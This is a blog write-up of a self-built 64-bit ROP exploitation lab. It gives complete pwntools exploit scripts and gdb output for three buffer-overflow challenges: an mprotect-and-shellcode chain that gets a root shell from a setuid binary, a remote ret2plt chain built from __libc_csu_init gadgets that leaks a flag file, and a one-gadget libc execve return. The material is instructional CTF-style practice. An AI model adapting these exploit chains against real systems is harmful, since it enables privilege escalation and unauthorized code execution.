A ROP Primer solution 64-bit style

Written on October 9, 2015

It turns out I’ve been blogging for 6 years as of today. To celebrate, here’s a writeup on 64-bit ROP exploitation! It’s a revist of barrebas’s awesome ROP primer, but compiled for 64-bit. This isn’t an official boot2root, just something I decided to do on my own for fun. barrebas provides the source code for each of the challenges in his ROP Primer so it’s just a matter of compiling it on a 64-bit system.

Setup

The binaries can be found at https://gist.github.com/superkojiman/b28c801a3b042072bc69. Here’s my setup in case you want to follow along:

# mkdir 0 1 2
# echo 'flag{challenge-completed}' > flag
# chmod 600 flag
# cp level0 flag 0
# cp level1 flag 1
# cp level2 flag 2
# chown -R root:root 0 1 2
# chmod 4755 0/level0
# chmod 4755 1/level1

This gives the following directory structure:

# tree -p .
.
├── [drwxr-xr-x]  0
│   ├── [-rw-------]  flag
│   └── [-rwsr-xr-x]  level0
├── [drwxr-xr-x]  1
│   ├── [-rw-------]  flag
│   └── [-rwxr-xr-x]  level1
└── [drwxr-xr-x]  2
    ├── [-rw-------]  flag
    └── [-rwsr-xr-x]  level2

3 directories, 6 files

I also kept ASLR on for challenges 0, and 1.

Level 0

level0 prompts the user for input and uses gets() to store the input into a buffer. RIP is at offset 40. Here’s what the stack looks like right before RIP is overwritten with 0x424242424242:

Starting program: /root/rop64/level0 < in.txt
[+] ROP tutorial level0
[+] What's your name? [+] Bet you can't ROP me, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBB!
[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x400278 (<_init>: sub    rsp,0x8)
RCX: 0x48 ('H')
RDX: 0x6b6760 --> 0x0 
RSI: 0x7fffffb7 
RDI: 0x0 
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7ffc99b9ea48 --> 0x424242424242 ('BBBBBB')
RIP: 0x400fe2 (<main+84>:   ret)
R8 : 0x4141414141414141 ('AAAAAAAA')
R9 : 0x488a00 --> 0x0 
R10: 0x4141414141414141 ('AAAAAAAA')
R11: 0x246 
R12: 0x0 
R13: 0x401630 (<__libc_csu_init>:   push   r14)
R14: 0x4016c0 (<__libc_csu_fini>:   push   rbx)
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400fd7 <main+73>:  call   0x407360 <printf>
   0x400fdc <main+78>:  mov    eax,0x0
   0x400fe1 <main+83>:  leave  
=> 0x400fe2 <main+84>:  ret    
   0x400fe3:    nop    WORD PTR cs:[rax+rax*1+0x0]
   0x400fed:    nop    DWORD PTR [rax]
   0x400ff0 <__libc_start_main>:    push   r14
   0x400ff2 <__libc_start_main+2>:  mov    eax,0x0
[------------------------------------stack-------------------------------------]
0000| 0x7ffc99b9ea48 --> 0x424242424242 ('BBBBBB')
0008| 0x7ffc99b9ea50 --> 0x0 
0016| 0x7ffc99b9ea58 --> 0x100000000 
0024| 0x7ffc99b9ea60 --> 0x7ffc99b9eb28 --> 0x7ffc99b9f540 ("/root/rop64/level0")
0032| 0x7ffc99b9ea68 --> 0x400f8e (<main>:  push   rbp)
0040| 0x7ffc99b9ea70 --> 0x400278 (<_init>: sub    rsp,0x8)
0048| 0x7ffc99b9ea78 --> 0x73eba12b198a1148 
0056| 0x7ffc99b9ea80 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x0000000000400fe2 in main ()

Here’s a layout of the process’ memory:

gdb-peda$ vmmap
Start              End                Perm  Name
0x00400000         0x004b4000         r-xp  /root/rop64/level0
0x006b4000         0x006b6000         rw-p  /root/rop64/level0
0x006b6000         0x006b8000         rw-p  mapped
0x013a9000         0x013cc000         rw-p  [heap]
0x00007f3130c3b000 0x00007f3130c3d000 rw-p  mapped
0x00007ffc99b7f000 0x00007ffc99ba0000 rw-p  [stack]
0x00007ffc99bf6000 0x00007ffc99bf8000 r--p  [vvar]
0x00007ffc99bf8000 0x00007ffc99bfa000 r-xp  [vdso]
0xffffffffff600000 0xffffffffff601000 r-xp  [vsyscall]

In my 32-bit solution, a stack pointer was conveniently found in one of the registers, but not so in this case. Fortunately the binary’s addresses don’t change, so I just have to call mprotect on it to make it executabe, read my shellcode into said memory, and then return to it to get a shell.

#!/usr/bin/env python

from pwn import *

buf = ""
buf += "A"*40

# make location 0x6b6000 to 0x6b8000 RWX using mprotect
# mprotect:
#   rax: 0xa
#   rdi: unsigned long start
#   rsi: size_t len
#   rdx: unsigned long prot

buf += p64(0x40159b)        # pop rdi; ret; 
buf += p64(0x6b6000)        # unsigned long start
buf += p64(0x432f29)        # pop rdx; pop rsi; ret; 
buf += p64(7)               # unsigned long prot
buf += p64(8192)            # size_t len
buf += p64(0x414796)        # add eax, 5; ret; 
buf += p64(0x414796)        # add eax, 5; ret; 
buf += p64(0x4546b5)        # syscall; ret; 

# read shellcode into 0x6b6000
# read:
#   rax: 0x0
#   rdi: unsigned int fd
#   rsi: char *buf
#   rdx: size_t count

buf += p64(0x40159b)        # pop rdi; ret; 
buf += p64(0)               # unsigned int fd
buf += p64(0x432f29)        # pop rdx; pop rsi; ret; 
buf += p64(30)              # size_t count
buf += p64(0x6b6000)        # char *buf
buf += p64(0x43168d)        # pop rax; ret; 
buf += p64(0)               # sys_read
buf += p64(0x4546b5)        # syscall; ret; 

buf += p64(0x6b6000)        # return to read-in shellcode
print buf

I also created a python script to send an execve shellcode to the binary when it calls read:

from pwn import *
context(os="linux", arch="amd64")
print asm(shellcraft.linux.sh())

Here it is in action:

$ (./sploit.py; ./sc.py; cat) | ./level0
[+] ROP tutorial level0
[+] What's your name? [+] Bet you can't ROP me, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�@!
whoami
root
cat flag
flag{challenge-completed}

So far so good!

Level 1

Things get a bit hairy in this level. level1 listens on port 8888 for connections and prompts us for input. It’s easy to overflow the handle_conn() function and gain control of RIP using the store command. In my case, I specified a file size of 500 bytes and sent an input file of 800 bytes. RIP gets overwritten at offset 572. Here’s what the stack looks like right before it returns to an invalid address:

[----------------------------------registers-----------------------------------]
RAX: 0x26 ('&')
RBX: 0x0 
RCX: 0x7f33543e6620 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x26 ('&')
RSI: 0x4012d8 ("  XERXES wishes you\n      a NICE day.\n")
RDI: 0x4 
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7ffd5f7c2028 ('A' <repeats 200 times>...)
RIP: 0x400f58 (<handle_conn+983>:   ret)
R8 : 0x4000 ('')
R9 : 0x7f33543589fa (<_IO_vfprintf_internal+22490>: cmp    BYTE PTR [rbp-0x4d8],0x0)
R10: 0x7ffd5f7c1c20 --> 0x0 
R11: 0x246 
R12: 0x400a00 (<_start>:    xor    ebp,ebp)
R13: 0x7ffd5f7c2140 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400f50 <handle_conn+975>:  jmp    0x400f57 <handle_conn+982>
   0x400f52 <handle_conn+977>:  jmp    0x400bda <handle_conn+89>
   0x400f57 <handle_conn+982>:  leave  
=> 0x400f58 <handle_conn+983>:  ret    
   0x400f59 <main>: push   rbp
   0x400f5a <main+1>:   mov    rbp,rsp
   0x400f5d <main+4>:   sub    rsp,0x30
   0x400f61 <main+8>:   mov    DWORD PTR [rbp-0x24],edi
[------------------------------------stack-------------------------------------]
0000| 0x7ffd5f7c2028 ('A' <repeats 200 times>...)
0008| 0x7ffd5f7c2030 ('A' <repeats 200 times>...)
0016| 0x7ffd5f7c2038 ('A' <repeats 200 times>...)
0024| 0x7ffd5f7c2040 ('A' <repeats 200 times>...)
0032| 0x7ffd5f7c2048 ('A' <repeats 196 times>, "\n")
0040| 0x7ffd5f7c2050 ('A' <repeats 188 times>, "\n")
0048| 0x7ffd5f7c2058 ('A' <repeats 180 times>, "\n")
0056| 0x7ffd5f7c2060 ('A' <repeats 172 times>, "\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x0000000000400f58 in handle_conn ()

The description of the challenge hints that we can use open(), read(), and write() to get the flag. So much like the 32-bit solution, I solved it using ret2plt. Unlike the 32-bit solution however, this turned out to be more complicated. In 64-bit binaries, the first six function parameters are passed in registers RDI, RSI, RDX, RCX, R8, and R9. Anything more is passed on the stack. In order to return to open@plt, read@plt, and write@plt, I needed to populate these registers with the proper values. Unlike level0, this is a dynamically linked binary so I had limited gadgets to work with. Fortunately, I can get everything I need from __libc_csu_init() as described here.

Here’s a breakdown of __libc_csu_init():

[0x00400a00]> pdf@sym.__libc_csu_init 
/ (fcn) sym.__libc_csu_init 101
|           ; DATA XREF from 0x00400a16 (sym.__libc_csu_init)
|           0x00401090    4157           push r15
|           0x00401092    4189ff         mov r15d, edi
|           0x00401095    4156           push r14
|           0x00401097    4989f6         mov r14, rsi
|           0x0040109a    4155           push r13
|           0x0040109c    4989d5         mov r13, rdx
|           0x0040109f    4154           push r12
|           0x004010a1    4c8d25100520.  lea r12, [rip + 0x200510]
|           0x004010a8    55             push rbp
|           0x004010a9    488d2d100520.  lea rbp, [rip + 0x200510]
|           0x004010b0    53             push rbx
|           0x004010b1    4c29e5         sub rbp, r12
|           0x004010b4    31db           xor ebx, ebx
|           0x004010b6    48c1fd03       sar rbp, 3
|           0x004010ba    4883ec08       sub rsp, 8
|           0x004010be    e885f7ffff     call sym._init
|           0x004010c3    4885ed         test rbp, rbp
|       ,=< 0x004010c6    741e           je 0x4010e6                  
|       |   0x004010c8    0f1f84000000.  nop dword [rax + rax]
|      .--> 0x004010d0    4c89ea         mov rdx, r13                   ; set rdx
|      ||   0x004010d3    4c89f6         mov rsi, r14                   ; set rsi
|      ||   0x004010d6    4489ff         mov edi, r15d                  ; set edi
|      ||   0x004010d9    41ff14dc       call qword [r12 + rbx*8]       ; hurdle #1
|      ||   0x004010dd    4883c301       add rbx, 1
|      ||   0x004010e1    4839eb         cmp rbx, rbp                   ; hurdle #2
|      `==< 0x004010e4    75ea           jne 0x4010d0                 
|       `-> 0x004010e6    4883c408       add rsp, 8
|           0x004010ea    5b             pop rbx
|           0x004010eb    5d             pop rbp
|           0x004010ec    415c           pop r12
|           0x004010ee    415d           pop r13                        ; set r13 which gets copied to rdx (see above)
|           0x004010f0    415e           pop r14                        ; set r14 which gets copied to rsi (see above)
|           0x004010f2    415f           pop r15                        ; set r15 which gets copied to edi (see above)
\           0x004010f4    c3             ret

Based on the above, if I returned to 0x004010ee, I could pop values into registers r13, r14, and r15. I could then return to 0x004010d0, which would copy the values from registers r13, r14, and r15, into registers rdx, rsi, and edi respectively. Once rdi, rsi, and edi are populated, execution continues until it reaches the ret instruction. In order to get there, the two hurdles pointed out above need to be overcome.

Hurdle #1 is a call to a function pointer.

|      ||   0x004010d9    41ff14dc       call qword [r12 + rbx*8]

I control both r12 and rbx, so I can control which function pointer gets called. _fini() is a good choice. Here’s what it looks like:

[0x00400a00]> pdf@sym._fini
/ (fcn) sym._fini 9
|           ;-- section..fini:
|           0x00401104    4883ec08       sub rsp, 8 
|           0x00401108    4883c408       add rsp, 8
\           0x0040110c    c3             ret

_fini() is at 0x00401104 and a pointer to it can be found in &_DYNAMIC:

gdb-peda$ x/11wx &_DYNAMIC 
0x6015d0:   0x00000001  0x00000000  0x00000001  0x00000000
0x6015e0:   0x0000000c  0x00000000  0x00400848  0x00000000
0x6015f0:   0x0000000d  0x00000000  0x00401104  <--- here's _fini()

The pointer to _fini() is at 0x6015f8. Just to make sure:

gdb-peda$ x/3i *0x6015f8
   0x401104 <_fini>:    sub    rsp,0x8
   0x401108 <_fini+4>:  add    rsp,0x8
   0x40110c <_fini+8>:  ret

So to overcome this first hurdle, I just had to set r12 to 0x6015f8, and rbx to 0.

Hurdle #2 is much easier to overcome. I just need to make sure rbx and rbp are equal:

|      ||   0x004010dd    4883c301       add rbx, 1
|      ||   0x004010e1    4839eb         cmp rbx, rbp
|      `==< 0x004010e4    75ea           jne 0x4010d0                 
|       `-> 0x004010e6    4883c408       add rsp, 8

I control both rbx and rbp, so I just set rbx to 0, and rbp to 1. By the time the comparison is made, both registers equal to 1.

After both hurdles are passed, the sequence of pop instructions that populate r13, r14, and r15 are called again. I took this opportunity to fill them with the proper values to be copied to rdx, rsi, and edi for the next function call to be chained. Here’s the final exploit:

#!/usr/bin/env python

from pwn import *

"""
Gadget from __libc_csu_init()

|      .--> 0x004010d0    4c89ea         mov rdx, r13
|      ||   0x004010d3    4c89f6         mov rsi, r14
|      ||   0x004010d6    4489ff         mov edi, r15d
|      ||   0x004010d9    41ff14dc       call qword [r12 + rbx*8]
|      ||   0x004010dd    4883c301       add rbx, 1
|      ||   0x004010e1    4839eb         cmp rbx, rbp
|      `==< 0x004010e4    75ea           jne 0x4010d0                 
|       `-> 0x004010e6    4883c408       add rsp, 8
|       |   0x004010ea    5b             pop rbx
|       |   0x004010eb    5d             pop rbp
|       |   0x004010ec    415c           pop r12
|       |   0x004010ee    415d           pop r13
|       |   0x004010f0    415e           pop r14
|       |   0x004010f2    415f           pop r15
\       |   0x004010f4    c3             ret
"""

r = remote("localhost", 8888)

buf = ""
buf += "A"*572

# setup the registers for open()
buf += p64(0x004010ea)      # pop rbx; pop rbp... ret
buf += p64(0x0)             # set rbx to 0
buf += p64(0x1)             # set rbp to 1
buf += p64(0x6015f8)        # set r12 to pointer to _fini()
buf += "JUNKJUNK"           # set r13 to junk
buf += p64(0x0)             # set r14 to O_RDONLY
buf += p64(0x40132c)        # set r15 to pointer to string "flag"

# move values in r12-r15 registers to the actual registers we need to use
buf += p64(0x004010d0)      # set rdx, rdi, rsi
buf += "JUNKJUNK"           # removed by add rsp, 0x8

# this part of the chain is back at 0x004010ea (pop rbx; pop rbp... ret) 
# so might as well use it to setup the registers for read()
buf += p64(0x0)             # set rbx to 0
buf += p64(0x1)             # set rbp to 1
buf += p64(0x6015f8)        # set r12 to pointer to _fini()
buf += p64(0x20)            # set r13 to num bytes to read
buf += p64(0x00601000)      # set r14 to buf to read contents of flag to
buf += p64(0x3)             # set r15 fd from open, most likely fd 3

# call open@plt
buf += p64(0x400980)

# move values in r12-r15 registers to the actual registers we need to use
buf += p64(0x004010d0)      # set rdx, rdi, rsi
buf += "JUNKJUNK"           # removed by add rsp, 0x8

# this part of the chain is back at 0x004010ea (pop rbx; pop rbp... ret) 
# so might as well use it to setup the registers for write()
buf += p64(0x0)             # set rbx to 0
buf += p64(0x1)             # set rbp to 1
buf += p64(0x6015f8)        # set r12 to pointer to _fini()
buf += p64(0x20)            # set r13 to num bytes to read
buf += p64(0x00601000)      # set r14 to buf to read contents of flag to
buf += p64(0x4)             # set r15 sock fd, most likely fd 4

# call read@plt
buf += p64(0x400920)

# move values in r12-r15 registers to the actual registers we need to use
buf += p64(0x004010d0)      # set rdx, rdi, rsi
buf += "JUNKJUNK"           # removed by add rsp, 0x8

# we're not chaining any more functions after write@plt so it doesn't matter
# what gets popped into the rest of the registers
buf += p64(0x0)             # junk
buf += p64(0x0)             # junk
buf += p64(0x0)             # junk
buf += p64(0x0)             # junk
buf += p64(0x0)             # junk
buf += p64(0x0)             # junk

# call write@plt
buf += p64(0x4008b0)

buf += "C"*(800-len(buf))

# send store command
print r.recvuntil(">")
r.send("store")

# send size of file
print r.recvuntil(">")
r.send("500")

# send file
print r.recvuntil(">")
r.send(buf)
print r.recvall()

Hopefully that wasn’t too confusing. Here’s the exploit in action:

$ ./sploit.py
[+] Opening connection to localhost on port 8888: Done
Welcome to 
 XERXES File Storage System
  available commands are:
  store, read, exit.

>
  Please, how many bytes is your file?

>
  Please, send your file:

>
[+] Recieving all data: Done (295B)
[*] Closed connection to localhost port 8888
    XERXES is pleased to inform you
    that your file was received
        most successfully.
 Please, give a filename:
>   XERXES will store
   this data as 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX'.
  XERXES wishes you
      a NICE day.
flag{challenge-completed}
\x89��o��
$ 

Got the flag. Moving on to the final challenge.

Level 2

I had to cheat on this one a bit by turning off ASLR. Due to the nature of addressing on 64-bit systems, null bytes become a really big problem. For this particular challenge, it’s easy to overwrite RIP, but I could only return to a single gadget due to the null bytes. The gadget I picked is a one-gadget-RCE from libc that executes execve(“/bin/sh”) to give me an instant shell. Using Hopper, I searched for references to “/bin/sh” that was followed by a call to execve(). I picked this one:

00000000000d48e7         mov        rax, qword [ds:0x3a2ea8]
00000000000d48ee         lea        rsi, qword [ss:rsp+var_168]
00000000000d48f3         lea        rdi, qword [ds:0x161160]                    ; "/bin/sh"
00000000000d48fa         mov        rdx, qword [ds:rax]
00000000000d48fd         call       execve

Since ASLR is disabled, libc’s base address won’t change during execution. So adding the offset 0xd48e7 to libc’s base address gives me the address I need to return to. First off, I needed libc’s base address:

gdb-peda$ vmmap
Start              End                Perm  Name
0x00400000         0x00401000         r-xp  /root/rop64/2/level2
0x00600000         0x00601000         rw-p  /root/rop64/2/level2
0x00007ffff7a33000 0x00007ffff7bd2000 r-xp  /lib/x86_64-linux-gnu/libc-2.19.so
.
.
.

Next add the offset and make sure I’m getting the same instructions I got from Hopper:

gdb-peda$ x/10i 0xd48e7 + 0x00007ffff7a33000
   0x7ffff7b078e7 <exec_comm+1767>: mov    rax,QWORD PTR [rip+0x2ce5ba]        # 0x7ffff7dd5ea8
   0x7ffff7b078ee <exec_comm+1774>: lea    rsi,[rsp+0x70]
   0x7ffff7b078f3 <exec_comm+1779>: lea    rdi,[rip+0x8c866]        # 0x7ffff7b94160
   0x7ffff7b078fa <exec_comm+1786>: mov    rdx,QWORD PTR [rax]
   0x7ffff7b078fd <exec_comm+1789>: call   0x7ffff7aeaae0 <__execve>

Looks good! So I just need return to 0x7ffff7b078e7 to get my shell. Here’s the final exploit:

#!/usr/bin/env python

from pwn import *

buf = ""
buf += "A"*40
buf += p64(0x7ffff7b078e7)
print buf

And now here it is in action:

$ whoami
koji
$ ./level2 `./sploit.py`
[+] ROP tutorial level2
[+] Bet you can't ROP me this time around, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�x��!
# whoami
root
# cat flag
flag{challenge-completed}

All done!

Hope you guys enjoyed this writeup. If you’re interested in learning some 64-bit ROP exploitation, give this a go. It’s not too hard and you might learn a thing or two along the way.